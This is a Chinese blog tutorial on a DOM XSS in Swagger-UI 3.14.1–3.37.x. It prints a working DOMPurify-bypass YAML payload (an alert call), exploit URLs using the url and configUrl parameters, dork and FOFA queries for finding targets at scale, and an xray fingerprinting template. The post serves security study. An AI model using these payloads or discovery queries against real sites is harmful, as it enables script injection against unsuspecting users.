热门标签
热门文章
- 1函数调用、递归函数_python中def fun(n)是什么意思
- 2cat 中几个统计jvm 和system 的类_jvm.memory:jvm.memory.used.percent
- 3支持向量机(Support Vector Machines)(需要优化)
- 4Druid数据源推荐配置_druid 数据源配置
- 5记一次Mysql 数据库诡异锁表解决过程_mysql in_use 1 和2
- 6Ubuntu18.04安装nvidia-docker2_unable to find image 'nvidia/cuda:latest' locally
- 7::在c++中的意思_c++中::是什么意思
- 8数字IC笔试千题解--填空题篇(四)_比如下面一句话 always @(posedge clk) begin a<= b; b<= c;
- 9Egret UI Editor1.12.0 升级辅助修改exml工具_eui 1.12
- 10L - OOXX Game_hentaigame
当前位置: article > 正文
渗透技巧基于Swagger-UI的XSS_poc-yaml-swagger-ui-unauth
作者:代码诗人 | 2024-02-04 13:25:30
赞
踩
poc-yaml-swagger-ui-unauth
免责声明:
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。
漏洞简述:
swagger-ui是一个允许 API 交互和可视化的库,Swagger-UI有一个特性它允许您向 API 规范提供URL一个yaml或json文件(例如http://swagger-server/swagger-ui.html?url=https://your_api_spec/spec.yaml、http://swagger-server/swagger-ui.html?configUrl=https://your_api_spec/file.json),它将被获取并显示给用户。该漏洞产生的原因是swagger-ui使用了一个过时的库DomPurify(DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全的HTML。),结合库的特性允许获得由查询参数控制的DOM型XSS。
受影响的版本:
- Swagger UI versions affected with the XSS: >=3.14.1 < 3.38.0
漏洞实现
POC
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' οnerrοr='alert(document.head)'>">
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
复现的时候踩了个坑
如果提示这个错误是因为无法跨域导致的,把Access-Control-Allow-Origin设置为*即可。
has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
我这里使用的是apache设置配置文件httpd.conf,最后一行添加即可
<IfModule mod_headers.c>
Header set Access-Control-Allow-Origin: "*"
Header set Access-Control-Allow-Methods: "GET,POST,PUT,DELETE,OPTIONS"
Header set Access-Control-Allow-Headers: "Content-Type"
</IfModule>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
yaml文件配置
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' οnerrοr='alert(document.head)'>">
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
json文件配置
{
"url": "http://IP/test.yaml",
"urls": [
{
"url": "http://IP/test.yaml",
"name": "Foo"
}
]
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
漏洞利用
- http://attack-ip/swagger-ui.html?url=http://self-ip/test.yaml
- http://attack-ip/swagger-ui.html?configUrl=http://self-ip/test.json
如何大规模找到 Swagger UI
搜索:intext:"Swagger UI" intitle:"Swagger UI" site:yourarget.com
FOFA
语句:title="Swagger UI"
XRAY
也可以改一改直接扫可以执行XSS的,这是之前写的懒得改了。
name: poc-yaml-swagger_ui
manual: true
transport: http
rules:
r0:
request:
method: GET
path: /swagger/index.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r1:
request:
method: GET
path: /swagger-ui.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r2:
request:
method: GET
path: /v2/api-docs
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r3:
request:
method: GET
path: /api-doc
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r4:
request:
method: GET
path: /index.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r5:
request:
method: GET
path: /v2/swagger.json
expression: |
response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
r6:
request:
method: GET
path: /v1/swagger.json
expression: |
response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
r7:
request:
method: GET
path: /api/swagger.json
expression: |
response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
r8:
request:
method: GET
path: /swagger/ui/index
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r9:
request:
method: GET
path: /api/swagger-ui.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r10:
request:
method: GET
path: /swagger/swagger-ui.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r11:
request:
method: GET
path: /actuator/swagger-ui.html
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
r12:
request:
method: GET
path: /swagger/v1/swagger.json
expression: |
response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
expression: |
r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() || r10() || r11() || r12()
detail:
author: zhibing
links:
- https://github.com/zhibx
description: swagger_ui
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
修复
1.升级Swagger-UI。
推荐阅读
相关标签
